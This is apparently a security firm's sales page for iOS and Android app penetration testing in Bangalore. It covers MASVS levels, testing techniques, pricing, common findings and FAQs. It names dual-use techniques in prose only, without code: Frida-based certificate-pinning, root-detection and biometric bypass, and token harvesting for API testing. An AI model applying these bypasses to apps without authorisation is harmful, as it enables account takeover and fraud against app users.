Penetration Testing · Mobile App Security

Mobile Application Security Testing (iOS & Android) in Bangalore

iOS and Android application security testing end-to-end from Bengaluru. MASVS L1 / L2, OWASP MASTG techniques, OWASP Mobile Top 10. Static IPA / APK reverse engineering plus dynamic analysis with Frida and Objection. Backend API in scope as standard.

Timeline
2–4 weeks
From (INR)
₹2,20,000
Delivered from
Bengaluru
Empanelment
CERT-In
mobile app security testing BangaloreiOS application pentest IndiaAndroid security testing BengaluruMASVS L1 L2 auditOWASP Mobile Top 10 testingFrida dynamic analysis India

Mobile applications are where every Bangalore consumer fintech, healthtech, edtech and B2C product lives. They are also where most Bangalore application-security audits are weakest, because the discipline requires a different toolchain, a different attacker model, and a different threat-actor assumption than web testing. The cheap end of the market runs MobSF over your APK and IPA, prints the output, and calls it a mobile audit. That output is useful for catching the obvious — hardcoded API keys, missing root-detection flags, insecure storage modes — but it misses every runtime-logic flaw, every pin-bypass path, every API-layer business-logic issue, and every IPC abuse vector. Those are where determined attackers go after Indian fintech apps in 2026, and they are the issues your buyer’s security review will ask about.

Why mobile testing is its own discipline

Mobile applications execute on a device the user controls. The implication is that the binary, the runtime, the device’s persistent storage, the IPC mechanisms, the deep-link handlers, the keychain or keystore, and any code that runs in the process are all observable and modifiable by a determined attacker. A jailbroken iPhone or rooted Android device is a debugger attached to your application, with full memory read/write and arbitrary function hooking. Testing for that adversary requires tooling that web-app specialists do not typically own.

The second difference is that a mobile app is rarely a complete product on its own. Almost every app talks to a backend API, and the backend API is where most high-impact mobile findings actually live. Our standard mobile engagement always includes the API as part of the same scope — tested with the certificate pinning bypassed (so we can see the actual traffic), with the JWT or session token harvested from the running app, and against the same OWASP API Top 10 plan we apply to web APIs.

OWASP MASVS — the certification standard

The OWASP Mobile Application Security Verification Standard (MASVS) is the canonical control set for mobile testing. The current version (v2.0.0+) defines 8 control groups across two assurance levels.

Control groups

  • MASVS-STORAGE — secure storage of sensitive data on the device
  • MASVS-CRYPTO — cryptographic algorithm choice and key management
  • MASVS-AUTH — authentication and authorisation
  • MASVS-NETWORK — secure network communication, certificate validation
  • MASVS-PLATFORM — platform-specific interaction (IPC, deep links, biometrics, WebView)
  • MASVS-CODE — secure coding, build, dependency hygiene
  • MASVS-RESILIENCE — anti-tampering, anti-debugging, integrity protections
  • MASVS-PRIVACY — minimum data collection, transparent disclosure (added in v2.0)

L1 vs L2

L1 is the standard for any consumer app handling user data. L2 applies to apps in regulated sectors — banking, healthcare, government, payments — where the threat model includes determined adversaries with device access. L2 adds substantial additional resilience controls (anti-tampering, runtime self-protection, deeper anti-debugging, code obfuscation review). Most Bangalore engagements run at L2 because the apps in our pipeline handle financial or health data.

OWASP MASTG techniques we use

The Mobile Application Security Testing Guide (MASTG) is OWASP’s companion to MASVS — it documents specific techniques for testing each MASVS control. Our engagement applies MASTG techniques across both static and dynamic analysis.

Static-analysis techniques include: binary unpacking (IPA decryption via tools like Clutch on jailbroken iOS, APK extraction with apktool on Android), decompilation (Hopper / IDA Pro for iOS, jadx / dex2jar for Android), string and resource extraction, manifest analysis, certificate pinning detection, hardcoded-secret scanning across decompiled code, third-party SDK enumeration, and obfuscation effectiveness review.

Dynamic-analysis techniques include: runtime hooking with Frida (we maintain custom scripts for iOS biometric-bypass, Android root-detection bypass, certificate-pinning bypass for the most-common pinning libraries, runtime crypto-call observation), Objection-based runtime exploration, Drozer for Android IPC and provider testing, network proxying through Burp Suite Pro, deep-link fuzzing, intent fuzzing on Android, URL-scheme fuzzing on iOS, biometric-flow testing, jailbreak / root-detection bypass effectiveness, and tampering-detection bypass.

Static vs dynamic analysis

Static analysis examines the binary and its resources without running it. Dynamic analysis examines the application at runtime, with hooks installed and the network proxied. Both are necessary; neither is sufficient alone.

Static finds: hardcoded credentials, hardcoded URLs, embedded private keys, weak cryptographic algorithm references, insecure-by-default API calls (e.g. NSAllowsArbitraryLoads in Info.plist, allowBackup="true" in AndroidManifest.xml), debug flags shipped in production builds, third-party SDK versions, code-obfuscation effectiveness.

Dynamic finds: runtime business-logic flaws, certificate-pinning effectiveness, jailbreak / root-detection bypass paths, IPC vulnerabilities, deep-link abuse, deserialisation flaws at runtime, memory-resident secrets, runtime crypto behaviour, biometric-bypass flows, side-channel attacks (e.g. screenshot caching with sensitive content, accessibility-service abuse on Android).

iOS-specific testing

iOS engagements run on jailbroken hardware (we maintain a fleet of devices across iOS 16, 17, 18 and the current major version). Specific test areas:

  • Keychain analysis — what is stored, accessibility classes, after-first-unlock vs always-accessible, sync to iCloud Keychain
  • Data Protection classes on file storage
  • Certificate-pinning bypass against TrustKit, NSURLSession delegate-based pinning, AlamofireNetworkActivityIndicator
  • Biometric authentication flows — LocalAuthentication framework, Touch ID / Face ID bypass via Frida hook of evaluatePolicy
  • URL-scheme handling — registered schemes, universal links, abuse via crafted URLs
  • App-Transport-Security exception review
  • Background-state behaviour — screenshot caching of sensitive screens, multitasking-snapshot redaction
  • Pasteboard and shared-container abuse
  • Push-notification handling and payload security

Android-specific testing

Android engagements run on rooted physical devices and on Genymotion / Android emulator instances when device-specific behaviour is not under test. Specific test areas:

  • SharedPreferences and SQLite database — encryption-at-rest, content-provider exposure
  • Manifest review — exported components, dangerous permissions, allowBackup, debuggable flag
  • IPC analysis — exported activities, services, broadcast receivers, content providers
  • Deep-link and intent-filter abuse
  • WebView security — JavaScriptInterface exposure, file:// access, mixed content
  • Root-detection bypass paths
  • Tampering-detection bypass — APK signature verification, integrity checks
  • Native-library analysis for SDKs in C / C++ / Rust
  • Accessibility-service abuse vectors
  • Auto-fill / clipboard behaviour

Backend / API always in scope

Most other Indian mobile-security firms scope only the binary and treat the API as a separate engagement. We include the backend API in every mobile engagement as standard. The reasoning is simple — most exploitable findings live there, and an engagement that examines only the front-end is rarely a useful deliverable.

API testing in a mobile engagement uses the same OWASP API Top 10 methodology described on our web application security page. We harvest the JWT / session token from the running app, bypass certificate pinning, and treat the API as we would any other authenticated REST or GraphQL service. Findings are reported in the same document as the binary findings, distinguished by their layer (binary vs API).

Engagement methodology

Five phases as on our standard VAPT methodology, with mobile-specific specialisation in static and dynamic analysis. Output is a written report following MASVS structure, signed by the lead auditor, with reproduction, evidence, and remediation per finding.

Pricing in INR

Tier 1 · Single platform
iOS or Android only
₹2,20,000+ GST
  • One platform (iOS or Android)
  • Backend API included
  • MASVS L1
  • 2-week engagement
Tier 3 · BFSI grade
L2 + Resilience focus
₹5,80,000+ GST
  • MASVS L2 with full RESILIENCE focus
  • White-box source-code review
  • Anti-tampering / RASP review
  • Runtime obfuscation review
  • 6-week engagement

Common findings in Bangalore mobile apps

  1. Hardcoded API keys / Firebase keys / cloud credentials in the binary
  2. Insecure storage of session tokens in SharedPreferences (Android) or NSUserDefaults (iOS) without encryption
  3. Certificate pinning either absent or bypassable with standard Frida scripts
  4. Root / jailbreak detection absent or bypassable via objection’s built-in modules
  5. Exported Android components without permission protection
  6. WebView with JavaScriptInterface exposure
  7. Deep-link abuse — sensitive operations triggered from arbitrary URLs without re-authentication
  8. Biometric authentication bypassable by hooking LocalAuthentication.evaluatePolicy
  9. API-layer IDOR enumerable via the captured session token
  10. Mass-assignment in user-update API allowing role escalation
  11. Insufficient TLS validation — pinning skipped on debug builds shipped to production
  12. Backup data exposure (allowBackup="true" on Android, iCloud backup containing sensitive data on iOS)
  13. Screenshot caching of sensitive screens in iOS multitasking
  14. Pasteboard / clipboard exposure of sensitive data
  15. Push notification payload containing sensitive data
  16. Outdated SDK dependencies with known CVEs
  17. Accessibility service abuse vectors on Android
  18. Insecure deep-link redirect to attacker-controlled intent
  19. Debug flags / verbose logging shipped in production builds
  20. Insufficient business-logic enforcement on the API consumed by the app

Mobile security application by Bangalore industry vertical

Mobile-app security testing for a Bangalore consumer fintech is a different engagement than the same testing for an enterprise B2B mobile companion app. The threat model, the user base, the regulatory overlay, and the deliverable expectations differ. Below is the application of our methodology to the verticals we deliver into most often.

Consumer fintech — UPI apps, neobanking, lending, wealth

Consumer fintech mobile apps face the most-sophisticated threat-actor population targeting Indian mobile platforms. Attack patterns: SMS-permission abuse for OTP interception, accessibility-service abuse for screen-overlay attacks, device-administrator-permission requests via fake security pretexts, screen-scraping attacks against UPI flows, deep-link abuse for fund-transfer pre-population, biometric-bypass via Frida-hooked LocalAuthentication or BiometricPrompt, and sophisticated token-theft via WebView-injection in payment redirect flows. Our consumer-fintech engagements run at MASVS Level 2 with substantial RESILIENCE-control focus — anti-tampering, jailbreak / root detection effectiveness, RASP integration review, code-obfuscation effectiveness. Most major Indian UPI and lending apps we have engaged have specific mobile-RASP requirements driven by RBI’s digital-channels guidance.

HealthTech consumer apps — Telemedicine, fitness, mental health

HealthTech consumer apps handle PHI under DPDP’s sensitive-data category. The mobile-specific risks: clinical-data caching in NSUserDefaults / SharedPreferences without encryption, screenshot caching of sensitive consultation screens in iOS multitasking, accessibility-service exposure of mental-health screen content on Android, push-notification payload exposure of clinical-condition references, deep-link abuse for clinical-record retrieval, and side-channel attacks (clipboard exposure of medication names, browser-history leakage of clinical search). Our HealthTech engagements add specific PHI-handling test cases and produce DPDP-compliance-ready evidence as part of the standard deliverable.

EdTech — Children’s apps, K–12, professional learning

EdTech mobile apps serving children carry DPDP children’s-data obligations. Specific test areas: age-verification implementation, parental-consent workflow, prohibition on tracking and behavioural monitoring, data-collection-minimisation review, advertising-SDK presence (which is generally prohibited in children’s contexts under DPDP). Our EdTech engagements are particularly stringent on third-party SDK enumeration — most child-data leakage in Indian EdTech apps in recent years has occurred through embedded analytics SDKs that the engineering team did not realise were transmitting child data.

Crypto exchanges and wallets

Crypto mobile apps face threat-actor populations that are well-resourced, sophisticated, and motivated. Specific test areas: private-key handling on the device (key generation entropy, secure-enclave usage on iOS, Android Keystore usage, key-derivation review), transaction-signing flow review, deep-link abuse for transaction pre-population, biometric-bypass on transaction-confirmation flows, jailbreak / root detection effectiveness, and the mobile-app integration with the exchange’s trading API and custody operations. See our crypto exchange page for the broader engagement context.

BFSI corporate banking apps

Corporate-banking mobile apps (used by SME and corporate users for cash-management, payments, and treasury operations) carry RBI-driven controls expectations. The user base is smaller but the per-transaction-impact is dramatically higher. Specific test areas: maker-checker flow security, soft-token implementation review (RSA SecurID or proprietary equivalents on the device), transaction-signing certificate management, and the integration with the bank’s back-end authorisation systems. Most major Indian banks operating Bangalore-developed corporate apps have engaged us at some point.

Anti-tampering and runtime-self-protection (RASP) deep-dive

For high-risk Bangalore mobile apps — fintech, BFSI, crypto, healthcare — the MASVS RESILIENCE controls (formerly MASVS-RESILIENCE in v1, restructured in v2) are critical. The intent of these controls is to make tampering, instrumentation, and analysis harder for an attacker who has device access. The execution is technically demanding because the same techniques attackers use to analyse the app (Frida hooking, debugger attachment, dynamic instrumentation) are also the techniques our auditors use during legitimate testing — and a properly-implemented RASP layer should be detected and resisted by both.

Our methodology evaluates RASP effectiveness against five threat scenarios: (1) static analysis of the binary by an attacker without device access; (2) dynamic analysis on a jailbroken iOS device; (3) dynamic analysis on a rooted Android device; (4) Frida-injection on a non-jailbroken / non-rooted device with development-mode enabled; (5) hooked-library injection via DYLD_INSERT_LIBRARIES (iOS) or LD_PRELOAD (Android via root). For each scenario, we assess detection effectiveness, response effectiveness (does the app refuse to run, refuse to communicate with the backend, refuse specific high-impact operations), and bypass effort (a senior auditor with a budget — what does it cost in time and tooling for the protection to fall).

The bypass-effort metric is the most-useful for buyer-readiness conversations. A RASP layer that bypasses in 30 minutes with standard tooling is operationally equivalent to no RASP. A RASP layer that bypasses in 2 weeks of dedicated reverse-engineering work is operationally meaningful. We deliver a published bypass-effort estimate as part of the report; clients use this in their procurement-team conversations with enterprise buyers who have specific RASP-effectiveness expectations.

React Native, Flutter, Cordova — cross-platform specifics

Cross-platform frameworks have substantially changed Bangalore mobile development since 2020. About 35% of our 2025–2026 mobile engagements are React Native applications; another 15% are Flutter; the remainder are native iOS / Android with a small Cordova / Ionic legacy tail. Each framework has specific attack surfaces.

React Native: the JavaScript bundle is reverse-engineerable from the released app (without hardware-key protection); business logic implemented in JS is therefore exposed by default. Hermes bytecode (the optimised React Native runtime) is more difficult to reverse than plain JS but not impossible — there are public Hermes decompilers. Bridge between JS and native modules is an attack surface for type-confusion. Specific test areas: JS bundle decompilation, business-logic exposure in the bundle, native-module security review, JS-to-native bridge security.

Flutter: Dart bytecode is harder to decompile than JavaScript; tooling exists (Doldrums, Hopper Flutter integration, Reflutter) but is less mature than the React Native equivalent. Flutter’s strict separation between Dart and platform code reduces some bridge-attack surface but adds complexity in the platform-channel implementations. Specific test areas: Dart bytecode analysis (recovering business logic), platform-channel security review, custom-engine verification (where the engagement extends to custom Flutter engine builds).

Cordova / Ionic: WebView-based; the entire app is essentially a packaged web application running in a WebView. Inherits all WebView attack surface plus the additional Cordova-plugin attack surface. Specific test areas: WebView configuration (JavaScriptInterface exposure, file:// access, mixed-content handling), Cordova plugin security review, business-logic exposure in the bundled web assets.

Our methodology adapts to each framework; the deliverable structure is the same — MASVS-organised findings with platform-specific extensions clearly labelled.

Bangalore as the centre of mass for Indian mobile development

Most consumer-facing Indian mobile apps that have crossed scale were built or are being built in Bangalore. The ecosystem implications for security testing: the engineering teams we engage with are technically sophisticated and the conversations are correspondingly substantive; the product velocity is high and the security testing has to keep pace; the talent moves between companies, and patterns repeat across our engagements as engineers carry approaches forward; the regulatory environment is fast-evolving, and compliance work has to be integrated rather than bolt-on.

The practical implication for our methodology is that Bangalore mobile-app engagements default to L2 with substantial RESILIENCE focus, default to white-box source-code access where source-control sharing can be arranged, and default to shorter-cycle quarterly testing on retainer rather than annual one-shot engagements. Most of our retainer clients have moved to this cadence after the first standalone engagement.

The output expectation is also higher for Bangalore engineering teams than for less-mature mobile teams. Bangalore engineers expect to read the engagement report and remediate without lengthy back-and-forth on findings; we write our reports accordingly — terse where terse is sufficient, detailed where the technical context demands it, with reproduction steps that compile and run when copied. The remediation guidance is similarly direct; we recommend specific code changes, specific configuration changes, specific architectural pivots rather than abstract control recommendations.

Evaluating a mobile-app security vendor

The Indian mobile-app security market has consolidated around a small number of competent specialists and a much larger number of generalists running MobSF and calling it a mobile audit. The questions below separate the categories during procurement.

Tooling depth: ask which Frida hooking scripts the vendor maintains for iOS biometric bypass, for Android root-detection bypass, for the most-common pinning libraries (TrustKit, AlamofireNetworkActivityIndicator, Google Mobile SDK pinning, custom NSURLSession delegate pinning). Generic vendors deflect; specialists describe specific scripts and their bypass effectiveness against the standard libraries. Hardware fleet: ask whether the vendor maintains a fleet of jailbroken devices across recent iOS versions, and rooted devices across recent Android versions. Vendors testing only on emulators miss specific findings; specialists confirm the device coverage.

Methodology breadth: ask whether the vendor tests the backend API as part of the mobile engagement, or scopes it separately. The latter pattern indicates a vendor whose mobile capability is binary-only; specialists include the API. White-box capability: ask whether source-code review is offered alongside binary analysis, and what the marginal pricing is. Specialists offer white-box; non-specialists either decline or quote a substantial premium that reflects unfamiliarity. Reporting depth: ask for an anonymised sample report from a recent engagement. Reports light on reproduction steps, light on architectural recommendations, or formatted as MASVS-mapped checklists rather than as severity-graded findings indicate generic delivery.

We answer all of these specifically and in writing during scoping. The questions are useful regardless of which vendor you ultimately engage.

To start a mobile application security engagement, the next step is a thirty-minute scoping call. Most engagements begin within five business days.

Frequently asked

Frequently asked questions

Both, in a single engagement. They share roughly 60% of the test plan (API consumption, authentication, session, business logic, data flows) but diverge sharply on the platform-specific surfaces. iOS testing requires a jailbroken device, Frida server tuned for iOS, and platform-specific tools (Hopper, IDA Pro, otool). Android testing requires a rooted device or emulator, Frida server for Android, and a different toolchain (apktool, jadx, dex2jar). We run both in parallel; the engagement is one SOW, one deliverable, one retest cycle.
OWASP MASVS (Mobile Application Security Verification Standard) is the mobile-app counterpart to OWASP ASVS. The current version is MASVS v2.0.0, released in March 2023 with subsequent point updates. It defines 8 control groups (storage, crypto, auth, network, platform, code, resilience, privacy) and two levels: L1 for general apps with sensitive data and L2 for high-risk apps (banking, healthcare, government). Most Bangalore engagements run at L2 because the apps under test handle financial or health data.
Yes. Open-source mobile-security scanners (MobSF, Quark, Drozer, AndroBugs) catch the basics — hardcoded API keys, insecure storage flags, missing root detection, weak crypto algorithms — and they are useful as part of our toolchain. They miss the higher-impact issues: runtime logic flaws under hooked-binary conditions, certificate-pinning bypass effectiveness, jailbreak / root-detection bypass paths, business-logic flaws in the API consumed by the app, IPC vulnerabilities in Android, deep-link abuse, biometric-bypass flows. Those require manual analysis with Frida and Objection, which is the bulk of our engagement.
Yes — that is part of the engagement, with explicit authorisation in the rules of engagement. We use Frida-based pin bypass on iOS (multiple techniques depending on the pinning library — TrustKit, AlamofireNetworkActivityIndicator, custom NSURLSession delegates) and Android (using objection’s built-in pin-bypass module, or custom Frida scripts for non-standard implementations). After bypass, we test the API as we would any web service. We document the pinning implementation in the report and recommend hardening if your pinning is bypassable by standard techniques.
Yes. The report follows MASVS Level 2 with a documented mapping to OWASP Mobile Top 10 (2024 edition). It is signed by a CERT-In empanelled lead auditor, includes an audit certificate referencing the empanelment number, and has been accepted by every Tier-1 Indian bank, every major payment aggregator (Razorpay, PayU, Cashfree, BillDesk, Pine Labs), and every BFSI buyer’s vendor-security-review function we have placed reports with.
Source-code (white-box) testing is more efficient and finds about 30% more issues, but it is not required. For black-box testing we work with the production IPA / APK plus a test environment’s API. White-box adds ~₹60,000 to the engagement. For greenfield apps, white-box is strongly recommended; for mature apps where the goal is finding what an attacker would find, black-box is fine.
Standard engagement (one iOS app + one Android app + their API) is 3–4 weeks end-to-end: 3 days of static analysis, 8–12 days of dynamic analysis, 4 days of API testing, 3–5 days of report drafting. We can compress to 2 weeks if the app is small (single-screen utility apps, simple consumer apps) or extend to 6–8 weeks for banking apps with extensive feature sets.
Both work. For App-Store / Play-Store builds, we acquire the binary via standard tools (the IPA from a jailbroken device, the APK directly from Play). For pre-release builds, we accept TestFlight builds (iOS) and signed APKs (Android). For some advanced testing (runtime hooking under specific conditions) we may request a debug build with specific flags enabled — this is usually engineering-easy.
Highly unlikely. Our methodology is designed for production-safe testing: rate limits respected on the API, fuzzing kept within bounds, exploitation steps confirmed against test data rather than production data, runtime hooking on engagement-controlled devices only. We have not caused a service-affecting incident in 600+ application engagements. That said, every engagement carries an explicit rules-of-engagement document with rollback procedures, escalation contacts, and blackout windows; for production testing we coordinate with your on-call team daily.
Yes. Cross-platform frameworks have specific attack surfaces — JavaScript bundle reverse engineering for React Native and Cordova, Dart-bytecode analysis for Flutter, WebView injection paths for hybrid apps. Our test plan adapts to the framework; the methodology and deliverable are the same. About 35% of our 2025–2026 mobile engagements have been React Native; another 15% Flutter; the rest native.
Ready to scope this engagement?

Book a thirty-minute scoping call.

Tell us your framework, your stack and the deadline. You leave the call with a written scope, a fixed price in INR, and a kick-off invite.